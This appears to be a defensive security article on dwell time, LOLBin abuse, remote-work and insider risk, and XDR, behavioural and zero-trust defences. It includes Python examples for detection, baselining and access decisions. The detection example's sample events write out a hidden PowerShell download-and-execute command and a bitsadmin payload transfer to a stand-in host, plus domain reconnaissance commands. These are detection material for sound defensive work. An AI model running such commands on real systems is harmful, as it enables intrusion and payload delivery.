The cybersecurity industry has a problem. Global security spending continues to rise, yet the rise does not correlate with a decrease in breaches. Back in 2015, it took organizations on average 206 days to identify a breach, and many more to contain it. Fast forward five years and the picture had improved, with the global median dwell time dropping below one month (24 days) for the first time in 2020 (the report behind that figure also noted that it is “likely the preponderance of ransomware that helped drive down the time between initial infection and identification,” since ransomware announces itself rather than hiding). One caveat when comparing the two numbers: the 2015 figure is an average and the 2020 figure is a median, so the trend is real but the two are not a like-for-like measurement.
However, 24 days is still plenty of time for threat actors to achieve their objectives. We need to get faster at catching and evicting them, reducing dwell time to something measured in hours or minutes, not days.
In order to do that, there needs to be increased focus on the common sources of hidden malicious behavior inside organizations. Let’s explore that and some best practices to mitigate the risk.
In the Firing Line
Commodity, automated attacks are still hugely prevalent: one vendor reported blocking nearly 63 billion threats last year, for example. But many cybercrime groups have realized that it pays to invest in sophisticated tooling and targeted intrusions. A good example is the recent proliferation of ransomware operations such as Ryuk and REvil. They increasingly use ‘living off the land’ binaries (LOLBins), abusing legitimate, signed Windows tools and processes to stay under the radar of anti-malware products. Lateral movement is often performed with WMI and RDP, network reconnaissance with nltest.exe and net.exe, retrieval of additional tools (such as modified builds of Mimikatz and Cobalt Strike) with PowerShell, and staging of the ransomware payload with the BITS service. Because every one of those binaries is expected on a Windows host, the detectable signal is not the tool itself but its context: which process launched it, what arguments it was given, and what sequence of activity it appears in.
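To make that concrete, here is an added example (not code from the article or from any vendor) that applies rule-based LOLBin detection to process-creation events and then correlates hits per host, so that a lone `net view` stays noise while recon followed by a PowerShell download on the same machine within half an hour becomes an alert. The events are constructed to resemble Sysmon Event ID 1 / Windows 4688 fields; the hostnames, usernames and URLs are invented.

```python
"""Rule-based detection of LOLBin abuse over process-creation events.

Added example: this is not the article's code and not any product's
detection logic. The sample events are constructed to resemble Sysmon
Event ID 1 / Windows 4688 fields; hosts, users and URLs are invented.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Each rule pairs an attack stage with a regex over the string
# "<parent basename>|<image basename>|<command line>", all lower-cased.
RULES = [
    ("recon",    re.compile(r"\|nltest\.exe\|.*(/dclist|/domain_trusts)")),
    ("recon",    re.compile(r"\|net1?\.exe\|.*(group .*admins.* /domain|\bview\b|localgroup administrators)")),
    # Remote WMI execution (wmic /node:... or Invoke-WmiMethod) lands as a child of WmiPrvSE.exe.
    ("lateral",  re.compile(r"^wmiprvse\.exe\|(cmd|powershell)\.exe\|")),
    ("download", re.compile(r"\|powershell\.exe\|.*(downloadstring|downloadfile|invoke-webrequest|\biex\b|-enc)")),
    ("download", re.compile(r"\|bitsadmin\.exe\|.*/transfer")),
    ("download", re.compile(r"\|powershell\.exe\|.*start-bitstransfer")),
]


def _basename(path):
    """Strip directory components so rules match on the executable name alone."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_stages(event):
    """Return the sorted list of attack stages an event matches (empty if none)."""
    key = "|".join([_basename(event["parent_image"]), _basename(event["image"]),
                    event["command_line"].lower()])
    return sorted({stage for stage, rx in RULES if rx.search(key)})


def detect_chains(events, window_minutes=30, min_stages=2):
    """Group rule hits per host and alert when >= min_stages distinct stages
    occur inside a sliding time window. One alert per host is emitted."""
    window = timedelta(minutes=window_minutes)
    hits = defaultdict(list)
    for ev in events:
        stages = match_stages(ev)
        if stages:
            hits[ev["host"]].append((datetime.fromisoformat(ev["time"]), ev["user"], stages))
    alerts = []
    for host, host_hits in hits.items():
        host_hits.sort(key=lambda h: h[0])
        for i, (t0, _, _) in enumerate(host_hits):
            in_window = [h for h in host_hits[i:] if h[0] - t0 <= window]
            stages = sorted({s for _, _, st in in_window for s in st})
            if len(stages) >= min_stages:
                alerts.append({"host": host,
                               "users": sorted({u for _, u, _ in in_window}),
                               "stages": stages,
                               "first": t0.isoformat(),
                               "last": in_window[-1][0].isoformat()})
                break
    return alerts


# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "alice", "time": "2021-03-01T10:00:00",
     "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\nltest.exe",
     "command_line": "nltest /dclist:corp"},
    {"host": "WS01", "user": "alice", "time": "2021-03-01T10:02:00",
     "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\net.exe",
     "command_line": 'net group "Domain Admins" /domain'},
    {"host": "WS01", "user": "alice", "time": "2021-03-01T10:05:00",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"},
    {"host": "SRV02", "user": "SYSTEM", "time": "2021-03-01T10:07:00",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c whoami"},
    {"host": "SRV02", "user": "SYSTEM", "time": "2021-03-01T10:08:00",
     "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "command_line": r"bitsadmin /transfer job /download /priority high http://example.invalid/p.exe C:\Windows\Temp\p.exe"},
    {"host": "WS07", "user": "bob", "time": "2021-03-01T11:30:00",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "command_line": "chrome.exe"},
    {"host": "WS07", "user": "bob", "time": "2021-03-01T11:45:00",
     "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\net.exe",
     "command_line": r"net view \\fileserver01"},
]

if __name__ == "__main__":
    for alert in detect_chains(SAMPLE_EVENTS):
        print(alert)
```

Run as-is it raises two alerts (WS01: recon then download; SRV02: a WmiPrvSE-spawned shell then a BITS transfer) and none for WS07, whose single `net view` matches a rule but never forms a chain. Raising `min_stages` trades recall for precision; the window and weights would be tuned against your own telemetry.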
To gain that initial foothold, threat actors have another secret weapon — mass remote working. The pandemic has disrupted security efforts while creating new gaps in protection that attackers have been quick to exploit. These include distracted home workers who click on links before thinking, and remote workers sharing devices and networks with people who engage in risky behavior (flatmates, children, and so on).
Remote-working infrastructure such as VPNs and team-collaboration apps with unpatched vulnerabilities, together with remote-working tools such as virtual desktop infrastructure exposed through accounts that lack strong password protection (or any second factor), create additional operational challenges for security teams.
Let’s also not forget that the threat isn’t only from malicious outsiders. Thanks to the financial pressures of the pandemic, and the difficulty employers have monitoring remote workers, there are many opportunities and incentives for malign insiders. Recent research found that such incidents can cost over $4m per organization annually and take on average 77 days to contain. One lottery worker in Italy tricked his employer out of €24m ($29m) over several years.
Inefficient offboarding, poor password management, and overprivileged identities compound both risks: a leaver’s account that is never disabled, or a standing admin right that is never actually needed, serves an intruder with stolen credentials just as well as it serves a malign insider.
A Three-Pronged Strategy
Visibility, context, and control are the name of the game for IT security teams. But even understanding the size of the organization’s existing endpoint and cloud estate can be a challenge, let alone securing it. Several best-practice approaches are worth considering here:
1) An XDR/MDR Approach
Address threat detection and response for each part of the IT estate in its own silo, and you’re likely to miss something. Events need to be stitched together across cloud, network and endpoint layers for comprehensive insight, an approach known as Extended Detection and Response (XDR). Managed Detection and Response (MDR) is useful because it effectively outsources all or part of the security operations function to a specialist third party. Using XDR and similar tooling, the provider can deliver 24/7 threat detection and containment, freeing your in-house security team to focus on more strategic work.
2) Behavioral Analysis
This is no time to rely solely on signatures and static rules. Your tooling must evolve to cope with LOLBins and other covert techniques such as lateral movement with stolen credentials. Behavioral detection uses machine learning to baseline normal activity across both managed and unmanaged devices; once trained, it can flag deviations from that baseline that no signature would catch, such as a workstation that has never run nltest.exe suddenly enumerating domain controllers. Enriched with local business context, such as who your VIP users are and which devices are critical, it offers a much stronger method of threat detection while improving the effectiveness of incident response. The caveat is that baselines drift as the business changes and must be retrained, and the first weeks of output need tuning before the alert volume is useful.
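The following added example (not the article's code, and not any vendor's model) shows the baselining idea in its simplest form: a frequency baseline of which binaries each host runs, from which parent, and how widespread each binary is across the fleet, with business context used to raise priority rather than to create alerts. Real products replace the counters with a model, but the questions asked are the same. The baseline events, new events, hostnames, usernames and the VIP/critical-host context are all constructed.

```python
"""Frequency baseline for process-creation events, a minimal stand-in for
the ML-driven behavioral baselining the article describes.

Added example, not the article's or any product's code. All events and the
business context below are constructed.
"""
from collections import Counter, defaultdict

# Constructed business context; in practice this comes from HR / CMDB data.
CONTEXT = {"vip_users": {"cfo"}, "critical_hosts": {"DC01"}}


class Baseline:
    def __init__(self):
        self.host_images = defaultdict(Counter)  # host -> Counter(image)
        self.host_pairs = defaultdict(Counter)   # host -> Counter((parent, image))
        self.fleet_images = Counter()            # image -> number of hosts that ran it

    def train(self, events):
        """Learn what 'normal' looks like from a clean historical window."""
        for ev in events:
            img, par = ev["image"].lower(), ev["parent_image"].lower()
            self.host_images[ev["host"]][img] += 1
            self.host_pairs[ev["host"]][(par, img)] += 1
        self.fleet_images = Counter(img for imgs in self.host_images.values() for img in imgs)

    def score(self, ev, context=CONTEXT):
        """Return (score, reasons); 0 means the event matches the baseline."""
        host, img, par = ev["host"], ev["image"].lower(), ev["parent_image"].lower()
        score, reasons = 0.0, []
        if img not in self.host_images.get(host, {}):
            score += 3; reasons.append("image never seen on host")
        if (par, img) not in self.host_pairs.get(host, {}):
            score += 2; reasons.append("parent/child pair never seen on host")
        if self.fleet_images[img] <= 1:
            score += 2; reasons.append("image seen on at most one host fleet-wide")
        # Context raises priority but never creates an alert by itself.
        if score > 0 and ev["user"] in context["vip_users"]:
            score *= 1.25; reasons.append("VIP user")
        if score > 0 and host in context["critical_hosts"]:
            score *= 1.5; reasons.append("critical host")
        return round(score, 2), reasons


def _repeat(host, user, parent, image, n):
    return [{"host": host, "user": user, "parent_image": parent, "image": image}] * n


# Constructed "normal week" across four hosts.
BASELINE_EVENTS = (
    _repeat("WS01", "alice", "explorer.exe", "outlook.exe", 40)
    + _repeat("WS01", "alice", "explorer.exe", "chrome.exe", 120)
    + _repeat("WS01", "alice", "explorer.exe", "excel.exe", 25)
    + _repeat("WS02", "cfo", "explorer.exe", "outlook.exe", 60)
    + _repeat("WS02", "cfo", "explorer.exe", "excel.exe", 80)
    + _repeat("WS03", "bob", "explorer.exe", "chrome.exe", 90)
    + _repeat("WS03", "bob", "explorer.exe", "excel.exe", 10)
    + _repeat("DC01", "SYSTEM", "services.exe", "svchost.exe", 200)
    + _repeat("DC01", "admin", "explorer.exe", "powershell.exe", 6)  # admins do use it here
)

# Constructed new events to score against the baseline.
NEW_EVENTS = [
    {"host": "WS01", "user": "alice", "parent_image": "explorer.exe", "image": "excel.exe"},
    {"host": "WS01", "user": "alice", "parent_image": "winword.exe", "image": "powershell.exe"},
    {"host": "DC01", "user": "SYSTEM", "parent_image": "cmd.exe", "image": "nltest.exe"},
    {"host": "WS02", "user": "cfo", "parent_image": "explorer.exe", "image": "mstsc.exe"},
]

if __name__ == "__main__":
    baseline = Baseline()
    baseline.train(BASELINE_EVENTS)
    for ev in NEW_EVENTS:
        print(ev["host"], ev["image"], baseline.score(ev))
```

Excel from Explorer on WS01 scores zero; PowerShell spawned by Word on a host that has never run PowerShell scores on all three counts; the same pattern on the domain controller or under the CFO's account is the same finding with a higher priority. Note what the context does not do: a normal event for a VIP is still normal.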
3) Zero Trust
Another best practice many organizations are adopting is zero trust, an approach that boils down to “never trust, always verify.” It is built on the idea that you must remove inherent trust from the network, treat it as hostile, and establish confidence in every connection before allowing it, regardless of where it originates. Foundational capabilities include risk-based multi-factor authentication (MFA), device profiling, network segmentation, protective monitoring, and more.
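As an added illustration (not the article's code and not any product's policy language), here is the shape of a risk-based access decision at a zero-trust policy enforcement point: device posture and session signals feed a risk score, resource sensitivity sets the minimum MFA strength, and being on the corporate network is recorded but buys nothing. The weights, the MFA tiers and the users in the sample requests are invented assumptions.

```python
"""Risk-based access decision for a zero-trust policy enforcement point.

Added example, not the article's code and not a real product's policy
language. Weights, tiers and the sample requests are invented.
"""
from dataclasses import dataclass

MFA_RANK = {"none": 0, "otp": 1, "phishing_resistant": 2}
# Minimum MFA strength by resource sensitivity tier (assumed policy).
REQUIRED_MFA = {"public": "none", "internal": "otp", "restricted": "phishing_resistant"}


@dataclass
class Device:
    managed: bool       # enrolled in MDM / known to the fleet
    compliant: bool     # patched, disk-encrypted, policy checks passed
    edr_running: bool   # endpoint sensor alive and reporting


@dataclass
class Request:
    user: str
    device: Device
    resource_tier: str          # "public" | "internal" | "restricted"
    mfa: str                    # "none" | "otp" | "phishing_resistant"
    on_corporate_network: bool  # kept for audit; deliberately carries no weight
    new_location: bool = False
    impossible_travel: bool = False


def risk_score(req):
    """Additive device/session risk. Network location contributes nothing:
    the network is treated as hostile either way."""
    score, reasons = 0, []
    if not req.device.managed:
        score += 3; reasons.append("unmanaged device")
    if not req.device.compliant:
        score += 2; reasons.append("non-compliant device")
    if not req.device.edr_running:
        score += 2; reasons.append("EDR not reporting")
    if req.new_location:
        score += 1; reasons.append("new location")
    return score, reasons


def decide(req):
    """Return ("allow" | "step_up" | "deny", reasons)."""
    score, reasons = risk_score(req)
    if req.impossible_travel:
        return "deny", reasons + ["impossible travel"]
    if req.resource_tier == "restricted" and not (req.device.managed and req.device.compliant):
        return "deny", reasons + ["restricted data requires a managed, compliant device"]
    if score >= 6:
        return "deny", reasons + ["session risk too high"]
    required = REQUIRED_MFA[req.resource_tier]
    if MFA_RANK[req.mfa] < MFA_RANK[required]:
        return "step_up", reasons + [f"{req.resource_tier} tier requires {required} MFA"]
    if score >= 3 and MFA_RANK[req.mfa] < MFA_RANK["phishing_resistant"]:
        return "step_up", reasons + ["elevated risk: re-verify with phishing-resistant MFA"]
    return "allow", reasons


# Constructed sample requests.
GOOD = Device(managed=True, compliant=True, edr_running=True)
BYOD = Device(managed=False, compliant=False, edr_running=False)

SAMPLE_REQUESTS = [
    Request("alice", GOOD, "internal", "phishing_resistant", on_corporate_network=False),
    Request("bob", BYOD, "restricted", "otp", on_corporate_network=True),
    Request("carol", GOOD, "restricted", "otp", on_corporate_network=True),
    Request("dave", GOOD, "internal", "none", on_corporate_network=True, new_location=True),
    Request("erin", GOOD, "internal", "phishing_resistant", on_corporate_network=True,
            impossible_travel=True),
    Request("frank", Device(managed=False, compliant=True, edr_running=False), "public", "otp",
            on_corporate_network=False),
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req.user, *decide(req))
```

Alice, off-network on a healthy device with phishing-resistant MFA, is allowed; Bob's BYOD laptop is denied restricted data even from inside the office; Carol is stepped up because restricted data needs a stronger factor than OTP; Erin is denied despite being on the corporate LAN with strong MFA because the session itself is anomalous. Every decision is re-evaluated per request, which is what "always verify" means in practice.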
This is, of course, not an exhaustive plan, but a starting point for thinking about what is required to mitigate cyber risk in a fast-changing world. The threat landscape is volatile, underpinned by an underground economy whose annual proceeds are now measured in the trillions. We need to get smarter about finding and stopping these threat actors and evicting them from our networks quickly, or we risk inevitable financial and reputational damage.